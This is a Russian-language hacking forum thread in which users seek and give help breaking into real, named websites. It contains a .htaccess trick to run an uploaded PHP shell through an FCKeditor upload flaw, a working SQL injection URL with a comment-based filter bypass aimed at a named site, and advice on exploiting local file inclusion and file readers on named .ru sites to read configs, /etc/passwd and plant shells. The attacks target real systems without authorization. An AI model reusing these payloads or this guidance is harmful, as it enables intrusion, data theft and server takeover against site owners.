Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. shramoff

    shramoff New Member

    Joined:
    15 Dec 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Нужна Ваша помощь.

    Нашел уязвимость на неком сайте в fckeditor. Можно заливать файлы все кроме php. Примечательно, что можно залить файл .htaccess даже. Я пробовал залить шелл с произвольным расширением в связке к примеру :
    Code:
     <Files *.123> ForceType application/x-httpd-php SetHandler application/x-httpd-php </Files>
    Но, вот какая незадача, он вместо запуска скачивается.
    Прошу Вашей помощи.
    Ccылка на уязвимость
    Ссылка на файлы загруженные через едитор
    Вобщем думаю знатокам будет интересно. Жду Ваших советов
     
  2. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    вопрос по htaccess

    могу ли я выставлять права в фаиле htaccess
    лежащем в деректории /var/html/www/1234
    на директорию /var/html/www/12345
    и как если да?
     
  3. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    нет. Не можешь. Только на дочерние.
     
    _________________________
  4. Qwert321

    Qwert321 Banned

    Joined:
    25 Jan 2009
    Messages:
    33
    Likes Received:
    0
    Reputations:
    0
    Как обойти фильтрацию для успешной PHP injection, если иклюдить файл, например:
    http://site/vulnerable.php?file=inj.php
    а надо
    http://site/vulnerable.php?file=../../inj.php

    + фильтрация такова:
    PHP:
    str_replace"/"""escape($_GET['file']))
     
  5. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Если сервер на Windows то может помочь обратный слэш \
     
    _________________________
  6. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    Как обойти фильтр union или select (как определить что именно фильтруется? group by нормально проходят)?
    Не хочу быть навязчивым, но сейчас результат моего скрипта ~20 предполагаемых скулей(15 из них подтверждаются, но "наличие" скулей в youtube и hpc напрягает :D) из 230 линков. Это нормальный показатель?
    Заранее благодарен.
     
  7. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Может линк покажите?
     
  8. FunOfGun

    FunOfGun Elder - Старейшина

    Joined:
    5 Sep 2012
    Messages:
    388
    Likes Received:
    72
    Reputations:
    124
    http://www.currents olutions.com/articles.php?id=8%20union%20select%201,2,3,4%20--
     
    1 person likes this.
  9. WendM

    WendM Member

    Joined:
    29 Jan 2012
    Messages:
    44
    Likes Received:
    7
    Reputations:
    3
    Собственно все просто, просто побольше читать... ;)
    Code:
    http://www.currentsolutions.com/articles.php?id=99999.9+/*!union*/(select+1,2,3,4)+--+
     
    3 people like this.
  10. 0xd098d0b3d0

    0xd098d0b3d0 New Member

    Joined:
    26 Oct 2012
    Messages:
    54
    Likes Received:
    1
    Reputations:
    0
    http://flowap.ru/download/index.php?...ile=config.php

    Я так понимаю это php инж. Но файл кфг пустой, что дальше делать??

    http://io.nios.ru/index.php?showpage&page=config.php
    И вот тут подскажите что делать дальше
     
  11. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    0xd098d0b3d0, RFI/LFI подразумивает под собой исполнение php кода из подгружаемого фаила.

    Во втором случае подгружает только из папки io.nios.ru/pages/ т.к фильтруются спец символы
    io.nios.ru/index.php?showpage&page=\%27/.@#$%^&*()
    нет возможности поднятся выше на каталог.
    Посмотри внимательно есть ли возможность повлиять на
    содержимое какого либо из этих фаилов.

    В первом не понял линк.
     
    #21591 ReVOLVeR, 18 Dec 2012
    Last edited: 18 Dec 2012
  12. 0xd098d0b3d0

    0xd098d0b3d0 New Member

    Joined:
    26 Oct 2012
    Messages:
    54
    Likes Received:
    1
    Reputations:
    0
    http://flowap.ru/download/index.php?act=open_zip&id=7853&file=config.php

    Вот линк первого.

    И как проверить эту возможность повлиять на содержимое?
     
  13. ReVOLVeR

    ReVOLVeR Banned

    Joined:
    2 Sep 2006
    Messages:
    170
    Likes Received:
    100
    Reputations:
    32
    http://flowap.ru/download/index.php?act=open_zip&id=7853&file=index.php
    а в этом случае читалка фаилов.

    WB Engine (MU-version)
    Ищи, в интернете , качай двиг, смотри где лежат конфиги.
     
  14. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Подскажите возможные исполЬзования такой LFI
    Code:
    _ttp://mreseo.com/hosting.php?id=../123
    Как видно из ошибок - скрипт дописывает окончание .php
    Конфигов базы я не нашёл.
    Желательно в ЛС и как можно более подробный гайд.
     
  15. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    Залить куда-нибудь шелл, запустить его уже есть возможность.
     
  16. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Ну я не нашёл способов залить его, а RFI тут нет =)
     
  17. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    По идее .php в конце добавляется автоматом, но если ты сделаешь такой запрос:
    то есть вероятность получить файл /etc/passwd и др.
     
  18. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    По сути дырка без возможности залить шелл бесполезна?
     
  19. herfleisch

    herfleisch Elder - Старейшина

    Joined:
    7 Jan 2009
    Messages:
    579
    Likes Received:
    203
    Reputations:
    13
    Смотря что ты имеешь ввиду под словом "бсеполезно". Просто найти LFI и залить шелл - это просто идеальнейший вариант, такой себе сферический конь в вакууме.

    Попробуй подобрать что-нибудь из этого, например.
     
    #21599 herfleisch, 19 Dec 2012
    Last edited: 19 Dec 2012
  20. qwwertty

    qwwertty New Member

    Joined:
    26 Dec 2009
    Messages:
    37
    Likes Received:
    1
    Reputations:
    1
    Интересная статья, но реализовать так и не вышло :(
    Полагаю для /proc/self недостаточно привилегий.
     
    #21600 qwwertty, 19 Dec 2012
    Last edited: 19 Dec 2012
Thread Status:
Not open for further replies.